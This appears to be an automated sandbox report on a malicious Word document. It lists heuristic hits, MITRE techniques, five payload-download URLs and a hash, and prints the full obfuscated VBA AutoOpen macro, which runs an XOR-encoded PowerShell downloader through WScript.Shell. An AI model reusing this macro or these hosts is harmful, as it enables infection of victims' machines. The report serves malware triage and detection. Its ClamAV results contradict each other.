Verdict: MALICIOUS
Risk Score: 352

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample triggers the critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, which indicates an obfuscated auto-exec VBA loader. The VBA script uses CreateObject and Shell() calls, and decodes URLs for a PowerShell loader. The script reconstructs a string beginning "wershell   .( $SHellid[1]+$sHellid[13]+'X') (( '103X43>23Q17I126-45Q38j52X110m44-33", which is part of a PowerShell command to execute a payload. The embedded URLs are likely the sources for this payload.
Heuristics (11)

- ClamAV: Doc.Dropper.Agent-6601909-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6601909-0

- VBA macros detected (medium, OLE_VBA_MACROS; 6 related findings): Document contains VBA macro code

- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script:

      HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS))
      pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949)
      wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm))

- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:

      HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS))
      pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949)
      wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm))

- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:

      HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS))
      pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949)
      wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm))

- Payload URL decoded from an encoded PowerShell loader (5 URLs) (high, OLE_VBA_ENCODED_PS_DROPPER_URL): A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:

      Attribute VB_Customizable = True
      Sub AutoOpen()
      On Error Resume Next

- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.asifabih.com/jzo/ (Referenced by macro)
  - http://www.dispozicija.viamedia.ba/JpDFY/ (Referenced by macro)
  - http://www.disp.viamedia.ba/EdsQhMy1/ (Referenced by macro)
  - http://www.bodyarmor.nu/PNNma/ (Referenced by macro)
  - http://www.anadolu-yapi.com/U4/ (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12889 bytes |

SHA-256: dea5ec0497f1073351279df4ee064d22cdc73a36966fc1fc4e087ad5da4055a5

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 264 of 437 identifiers look randomly generated (e.g. 'dhMFmfjjsJdWf'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "TjSpPTVmMA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DviKAw = (83353 / IkWns) - 52102 - 87069
DaWzt = (96278 / rhZMrp) - 4900 - 64052
AORLV = (30200 / uhpTS) - 18714 - 33717
KjVsZS = (92160 / RCApa) - 9177 - 34667
OVXSBbFTzTb (PJpwSu + dzUYtKDd + UIosqizH)
GEDNH = (64017 / HDLId) - 46921 - 45172
qbfoQ = (65607 / BstiO) - 52864 - 98959
End Sub
Attribute VB_Name = "dhMFmfjjsJdWf"
Function PJpwSu()
On Error Resume Next
OLlGdO = (sJhKV * 91514 * 90914 + MwMCw - 7750 - YwiOsQ * TvfPUo / WWRzn * (bHczm + Sviwi - 36918 * lmnXO))
jTZIOC = ONlBw - lzzGQ + uDdHdv / 23046 + zkpnT - UUHfLl
AqmfGb = (kqZvF * 20114 * 98731 + RWkcT - 97103 - kwwvwC * jwDbnE / UzrKSh * (IDdIW + VQnmCB - 7586 * piKdE))
QjRTQw = "wers" + "hell" + " " + " " + " ." + Chr(40) + " $SHe" + "llid[1"
nntuhT = (zDkaQ * 94066 * 46338 + nBizK - 60430 - hJSkuB * iHhijN / TjPwVB * (KOwdji + kjLBF - 18216 * jcwYz))
AiRvp = (ZCqsql * 55890 * 16189 + TDrIv - 96133 - OrnidA * iOPDF / iwjWs * (GzRpJ + vHhfP - 9371 * NXPaHK))
rdWvRw = (sRBQr * 53955 * 86732 + nbUJS - 21851 - YmAfi * hhNcw / LzmbRZ * (uUAkMd + PXBjvo - 30071 * EkvmRK))
cshNK = (USSCo * 56628 * 95237 + vTGOT - 47894 - YWhiDr * GSYWiI / VRQVdn * (QINbL + oIpJfu - 57348 * VAiHN))
PCqwPKMT = "]" + Chr(43) + "$sHe" + "llid[1" + "3]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + Chr(40) + " '1" + "03X43" + ">23Q17I12" + "6-45Q" + "38j5" + "2X11" + "0m44-33"
zJjpW = (ImDAiU * 47411 * 90093 + WGVww - 94710 - iCJRnJ * HzDCI / lFSAI * (mZjzL + JZsNKA - 49070 * BijfE))
HdaiXs = (XWVQjr * 56623 * 94179 + idisi - 6279 - LOrsOV * LjqUr / PadDXK * (uoIWt + Ychdj - 6221 * iPTfz))
mwCbSP = (TRnUqm * 20937 * 43730 + DzmdkH - 87860 - DcEJHY * vJKAdd / tOZGb * (pJntij + iRVOiC - 30801 * qLaMs))
bZiDTijC = "Q41j38k3" + "2m55" + "X99A13-38" + "j55,109" + "I20j3" + "8,33,0>4" + "7Q42>38>4" + "5Q55Q1" + "20m1" + "03k41-0," + "54A126" + ">100"
tjQdct = (wbjWK * 44562 * 82772 + VBDCIk - 59323 - ifuRF * bYMAB / mNXXDW * (TMXUR + LKARCb - 24312 * Lizib))
bKtUfE = (DdfTw * 87029 * 79326 + iauEd - 76965 - VaNzCD * tiaQcL / lLzdtR * (wjTiBz + lwvvtf - 78237 * GfCUF))
YtdqQBPVtu = "k43-55>5" + "5j51X121," + "108m10" + "8-52,5" + "2m52Q109" + ">34,4" + "8,42" + "A37X3"
bErXZM = (HwzjOp * 7843 * 8634 + FjLYX - 18367 - ipwzsw * aPCWc / ujQRK * (XmZXaS + iuAVA - 19632 * RIhcM))
ZipCpz = (BFQpoH * 95029 * 84371 + Pcikm - 69370 - ZjpTOj * zZwRv / ljuji * (JppnoV + FtimB - 5029 * vQTzjY))
LJJVA = (Hijwl * 67584 * 21692 + LKcpt - 14639 - HJZoba * ZobMWS / NLvbD * (WlDpd + DWmGm - 30798 * ZEAkj))
lZRLT = (mbYSuO * 51717 * 72870 + JRWjX - 27674 - ZtCMK * lzoEL / mNHMGr * (HVhbmj + QzPFfb - 92353 * zXJHR))
IYLamGbFsEf = "4Q33Q42I" + "43I109m" + "32k44" + "k46A108I4" + "1>57" + "m44m108" + "Q3I4" + "3A55A55A" + "51A121k" + "108j1"
WKBAi = (GvYwzC * 83548 * 14733 + twRosM - 52708 - waYnMw * pvDvi / VzEdj * (YizXDX + WqhMQ - 12363 * OCaFzt))
EcOjZ = (vwHcN * 39553 * 67947 + Znhizs - 23316 - wOtia * TZOBC / uPFVfb * (ztvWPV + YNnbIz - 94234 * izmqpl))
QrpBo = (jiwFpa * 88678 * 68382 + AwGiJU - 74967 - PGIVQv * FfGYZv / TTYNwo * (NPAjWw + Rntwdw - 49448 * fLQnwA))
JDwvc = (XzNKM * 28621 * 6403 + BCVPp - 50741 - Hjnpk * TWwdm / IVtZHv * (wrUBE + rwAYjk - 8963 * wBUKG))
AlOdCI = "08A52X52X" + "52X109I" + "39m42k48k" + "51X44k5" + "7A42A32Q4" + "2A41j34" + "I109m5" + "3>42X" + "34Q46X38" + ">39X4" + "2m34m109"
PJpwSu = QjRTQw + PCqwPKMT + bZiDTijC + YtdqQBPVtu + IYLamGbFsEf + AlOdCI
OVijiO = (aKOGz * 28810 * 90803 + zaKbI - 99015 - Gqhvp * DwJDQu / FXczwf * (lMNQYi + cCEHd - 81111 * OswiZ))
MSmhK = (LDVwMZ * 5727 * 86152 + MdkFmn - 86249 - zHlGi * mKWKhJ / iPOfbY * (DkMbGI + LBXwaT - 30105 * ZYccOj))
MECiT = (EbzLfd * 5496 * 55317 + dRXKba - 91428 - vnEwq * iQWwZY / KiEhJ * (Fsczn + UOjLP - 10259 * RzHvPA))
End Function
Function dzUYtKDd()
On Error Resume Next
zVUEOz = (HEoUz * 26504 * 41222 + FjVPf - 83207 - EZPJS * JXCfAN / SCWYop * (XCKWbf + uPJARn - 85983 * uoEhi))
cdUjJq = (uWHnKW * 5664 * 64837 + Ioknb - 75777 - MbHRYL * AOJvd / ErcVdl * (OHUNV + CHmAw - 38448 * jIHCYN))
uIidE = (TjTdRZ * 81235 * 24412 + nRYWQ - 94802 - HtcHI * mojwF / wTVJUh * (zrloXa + nHzcrf - 42433 * BlAwiP))
lpzAjm = (KzbqB * 63197 * 3861 + timDO - 15744 - fjZwCH * TGGrqQ / Xaztr * (LYblL + fuWui - 70057 * sJPak))
hvuSJPJqhj = "m33X34-1" + "08j9,5" + "1A7j5Q2" + "6,10" + "8-3,4" + "3-55j55X" + "51-121A" + "108A1" + "08j52j52" + "I52>"
GjmRun = (aUoFA * 5170 * 16610 + mdbwO - 4174 - jPUQit * aioKM / JoTrqS * (jLDcw + FHfMA - 43797 * OwWwdI))
YBaZz = (QLOKq * 29542 * 65089 + HtwNJ - 519 - ONboB * jZzQDI / jTnvL * (qalld + zDAJc - 98736 * OuJoz))
OnOjiRbfTib = "109,39j42" + "Q48Q51>10" + "9Q53X42X3" + "4X46k38X" + "39,42" + "-34Q109,3" + "3-34" + "Q108I6" + "A39>48," + "18-43Q1" + "4k58"
pRUWZ = (NLjzY * 80958 * 88002 + wboGS - 7157 - iEnKHj * TSbjFT / AkBlzw * (oJcBkp + GwbUTm - 12645 * hMSWf))
JRppOz = (JkHvdJ * 46913 * 22772 + UNoGuS - 75370 - QjMRWN * GLoBlm / CFIWc * (aSEYLE + uXGAr - 58923 * Zinhm))
WokZb = (rmVUHE * 89919 * 91316 + JWtGM - 37127 - Omhin * pSbQr / mnQKO * (PMGzLi + RVDwd - 47244 * wWZwsw))
vXcTahFUSFS = "A114m108k" + "3A43m55k" + "55j51m121" + ">108k108" + "k52k5" + "2Q52" + "m109" + "I33j44m3" + "9I58" + "k34A49Q" + "46-44I"
JatMKV = (qJEdfM * 67308 * 54248 + AzihoD - 87658 - piUFX * XUoQo / rlkMAl * (TQzbY + uvAWSE - 12498 * UXfBlT))
CtqMYI = (sLfdz * 13140 * 88581 + awTVh - 74190 - wsMYQ * RSSTb / DFVVn * (wKkzu + rcKYtd - 77668 * KjvwA))
Irwusu = (NShCC * 50184 * 15592 + DwXdOW - 97625 - MhCXO * KOSCl / GfdpA * (nDlCEH + fcENp - 70283 * JVjMq))
RwwIXYiXptt = "49,109X4" + "5j54A10" + "8Q19m13m1" + "3Q46" + ">34Q108" + "-3Q43,55Q"
HSjAo = (lXTich * 67931 * 90385 + KdvKib - 11982 - cRbwk * Qwdjiw / SETMu * (lfNDb + lZjvM - 33135 * BRGiMB))
NQSbG = "55>51X121" + ">108k108," + "52j52I5" + "2j109k" + "34m45>34" + "-39X4" + "4X47-54j1"
jzAEw = (rZcwo * 42665 * 39604 + POzkz - 42880 - DQPwuB * VGLud / vNCWPT * (KSNcLj + rUNQAF - 40500 * ikHDPj))
ENOPuuV = "10>58X34" + "-51k42>10" + "9,32Q44m4" + "6k108I2" + "2X119,10" + "8j100" + "m109I16X" + "51Q47" + ",42j55>1"
bnQoc = (TSkft * 17435 * 97003 + HQWwT - 84962 - voETi * zYMQNV / sdjGDs * (WYjIT + bNGnZa - 43146 * jwMUtX))
GYUqR = (GMAuC * 22575 * 77119 + PBnCR - 12069 - wzDtl * aZjHtu / aNpAzA * (FkjvMD + tSMMM - 57731 * JaQwj))
uslZCL = (UjoXlD * 75222 * 72300 + GUBtu - 88114 - OQiRO * EBGwb / SvVoIj * (UQzufz + pJMCd - 84966 * UXJYu))
XOfnKh = (jPuboA * 42893 * 15346 + zpGkRZ - 82228 - wBMiUl * UibBR / jjujXX * (zhlKqR + ERldz - 46427 * oIUzPd))
EiOXiSUd = "07>100Q" + "3A100I106" + ",120k103" + "A8X37-23" + "k99k1" + "26A99A100" + "m119A12"
jsqfrR = (lYmqA * 94067 * 71846 + ulTaQp - 40702 - SlaFK * EHaSsZ / fYGum * (ZVIjwG + FSGoYs - 28159 * XtQMLq))
LPImT = (RQQwK * 2890 * 18666 + iTsQV - 10352 - pYhAiX * GnzjC / Smujf * (RrvMfT + NHCzi - 53379 * YWqalp))
arDQH = (DMzjId * 98928 * 41053 + uvrCTj - 70628 - NQKou * jYVJr / bdwjA * (dBCVz + iIMLqV - 59816 * qVqzz))
QmIRuq = (MmDQI * 96381 * 22988 + IhhTj - 12196 - uhQqR * YETYSS / wmvIh * (GaJvVE + MIOwIz - 62554 * rbAEZP))
PiELiP = (MjdMv * 89378 * 19174 + iwUpl - 2928 - tALbIf * halEqt / suHqFt * (ufShN + mNqBid - 56150 * EAGGhX))
jZNLwGCnq = "2-113I1" + "00X120," + "103I37-1" + "4-11-12" + "6k103A" + "38j4" + "5A53>1"
ELusZM = (BwLzk * 90545 * 51256 + QVFzT - 35139 - sKWRbj * njijL / dDuiR * (ccsip + flWzi - 68747 * hJSkW))
cBawJ = (wYJlon * 88522 * 86962 + BjJKG - 8063 - OIKbww * zqwOh / LFVLZ * (doznE + cdYEjZ - 93949 * mmSoh))
wrjuHdjCj = "21j55I38" + "m46X5" + "1,104" + "A100," + "31m100j" + "104X103k" + "8>37" + "A23,104" + ",100Q" + "109k38>" + "59-3" + "8Q10"
dzUYtKDd = hvuSJPJqhj + OnOjiRbfTib + vXcTahFUSFS + RwwIXYiXptt + NQSbG + ENOPuuV + EiOXiSUd + jZNLwGCnq + wrjuHdjCj
lNuCE = (GpzlM * 88076 * 94962 + isTqr - 10424 - ZrKjdq * YAhqw / szOUD * (zCqhw + vXPizp - 64684 * TLWkSa))
cJiTBj = (YNaaj * 31819 * 79751 + zbhPv - 91065 - pwuMd * KSYWj / zTOPn * (dNIWH + GsqSI - 78079 * pzbTjY))
End Function
Function UIosqizH()
On Error Resume Next
zDVvk = (jiwno * 10485 * 67851 + KNpiSw - 82055 - sJOsj * dCdtFl / dbzKwj * (BCtik + MWdrrw - 50252 * LMhssG))
VnBEwoSVa = "0I120" + "I37A4" + "4A49k3" + "8-34j32Q4" + "3>107Q10" + "3j14-34," + "47Q99"
vAzrh = (pXUQnw * 81348 * 30099 + IEQGZl - 3603 - LsSPR * FZCEs / inlikn * (WhmzU + zkoquX - 47675 * slwPWX))
PfwYM = "I42," + "45j99X103" + "A41Q" + "0m54>1" + "06-56m55j" + "49k58,5" + "6I103>43>" + "23A17" + ",109"
VIWCWi = (nancT * 91066 * 59785 + vLrSnj - 96249 - MrKkZ * sTYvpi / PFrlq * (rQaEC + rQSUBj - 99039 * wJLMz))
kuwRFV = (lWlRf * 48925 * 47447 + zSUiQj - 16155 - TFlBmP * POIrC / WfsPV * (YlHOT + FREDX - 95818 * cMiLT))
iTDYGw = (jGAhw * 27583 * 12436 + lnHIhc - 48337 - XOpLRF * inuYJw / jwfXk * (UUjlR + YXEoO - 32501 * UjJQk))
BGEEWGQ = "-7m44Q52A" + "45-47>44X" + "34m39Q5," + "42k47," + "38m107A" + "103>14X"
iqhMfb = (IaCXFj * 76599 * 53825 + DlMtTE - 54835 - JChKO * oljNd / qjKCf * (QpUkP + uwsjL - 82703 * dNQDc))
VtCpz = (OHLdKs * 24421 * 58939 + fEuLh - 42629 - zfIAb * WfuUKz / bjvUJJ * (tLDYw + ddLqrs - 81381 * tWhwUY))
uDNlYS = (OsUbK * 27122 * 32426 + nzYnaP - 31194 - FZpCzz * jhHqIN / iMzvjF * (HBcup + SipTYi - 47164 * LjQLO))
ViqOWvtDh = "34-4" + "7I111I" + "99j103I" + "37A1" + "4>11" + "m106A1" + "20j16m5" + "5-34>49Q5"
vRXVj = (GUvKD * 69933 * 83887 + dKWIjG - 47960 - ccwMjB * bWNhs / WvwbOP * (GfHBJP + TQjIdj - 26910 * uWWpFM))
wjKpFD = (sLGkTm * 33249 * 32695 + rpbBl - 6424 - DcsjAU * uqsZrG / zmVaaJ * (mqNTh + kkmzqt - 5383 * MNXzX))
CXIbLO = (pfjKG * 95437 * 46826 + HJZHC - 84341 - SioTWc * jRnkOw / mOPER * (ooTSK + WIBpKl - 3085 * Eimsr))
pCzHHO = (hUqlb * 95035 * 41064 + CUapKn - 9029 - JihAa * YJbmr / wKITE * (Bnnzms + ZTVfX - 18579 * lwqcZN))
BuvmcK = "5k110j19" + "m49j" + "44Q32m38" + "m48j4" + "8Q99>103" + "m37,14" + "I11-" + "120m33k" + "49j3" + "8,34A40," + "120-6" + "2I32"
aNaKYu = (FaKuE * 31685 * 72807 + MTpuJD - 89846 - zDjkYz * DcNsQA / WGqhjX * (wwqbiL + ilCqfi - 54479 * rKiHz))
cdTiOiwhpXw = "Q34k55" + ">32j43X5" + "6I62A62'" + " -sPL" + "it'J' -S" + "PliT',' " + "-Split" + " 'K'-sPlI" + "t'-'-sP" + "lIT '"
wwfRz = (DltQV * 19165 * 69921 + buoONd - 29412 - ZkHcz * vrAfI / UKvME * (zDbjRQ + lJONSF - 90595 * vYvJV))
fDuKGA = (uNBwmq * 74614 * 91188 + TfRZj - 97992 - iuhsWz * SGUcG / bMBowL * (psznmt + WwaZC - 62375 * LQYIK))
zZbfSw = (WqdTq * 34633 * 35167 + aDzwFC - 46797 - uqnGCm * ZZfLR / jqwwS * (loVXI + dGMqrl - 57069 * phpir))
XViSwi = (bXXDw * 10037 * 81026 + pmwUr - 21266 - kVRQP * DYZXhH / FEshz * (aSIbdB + BoVzn - 50205 * VlIBjT))
irSNj = (wGicd * 41139 * 99895 + pvuFdr - 58907 - jvaZQ * wdjlQ / GBjZGj * (PUzvh + bWVdCh - 8185 * PLWnGt))
pBPpBh = (RwbKj * 61648 * 23355 + qSrjMJ - 65101 - iZNtYl * CiENN / TbONVr * (lHVPw + icSoN - 50146 * XjQoo))
iMBJC = "I'-sPLIT" + "'x'-SPli" + "t 'M' " + "-spLIT '" + "Q' -" + "SPLIT 'A'" + "-sPLIT" + " '>'|% {" + " [ChaR] " + Chr(40) + " $_-BXor"
wsFNm = (OUzthO * 97558 * 67773 + ttosaz - 57437 - LErqJ * zpaFTA / bSpiH * (CoWTQ + XtNFqj - 3367 * otJuw))
imrFKJk = " " + Chr(34) + "0x43" + Chr(34) + " " + Chr(41) + "}" + Chr(41) + "-join" + " '' " + Chr(41) + ""
UIosqizH = VnBEwoSVa + PfwYM + BGEEWGQ + ViqOWvtDh + BuvmcK + cdTiOiwhpXw + iMBJC + imrFKJk
DGIii = 91565 + awKTq - (51907 * okaOm / 86007 * kkWSiP + (JukCaC / 69969 / Kltcc / GfQLrZ))
End Function
Attribute VB_Name = "GpAuCNSBAIQ"
Function OVXSBbFTzTb(ZXHabCrIobC)
On Error Resume Next
ZvdUl = ltnNmb / WVwDo + 53564 + FSciU * (YchDpN - iHwjJl + (77166 - MCnIbs * fBFcwN + GTzzqS))
jXYhp = YRtDn / tPpVtC + 55477 + fwMRjf * (dhJuV - zTPjtC + (63104 - jLZIj * qddGo + MhlKGA))
kkISst = ZmzAwp / mnJzZK + 98651 + DGfYS * (EdsrSL - aQqqMu + (8415 - GntWlw * zDkEw + hCmTaN))
HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS))
pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949)
wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm))
hwGBzn = oYUXK / cLWrE + 42035 + CZimJr * (rSvOhr - KKdIUC + (60599 - SvtBb * tLFsR + lHRTsI))
ajLfzm = JszjB / iaNAIi + 3078 + sCwEh * (AcLTtO - zEqnn + (95605 - HBfHbY * pCdKd + iihOb))
Ujjim = jlVWNU / VzrWpc + 16854 + LaiJP * (iPWbLX - LbUBUo + (84086 - TfQpzt * qKZwHv + GzUXo))
End Function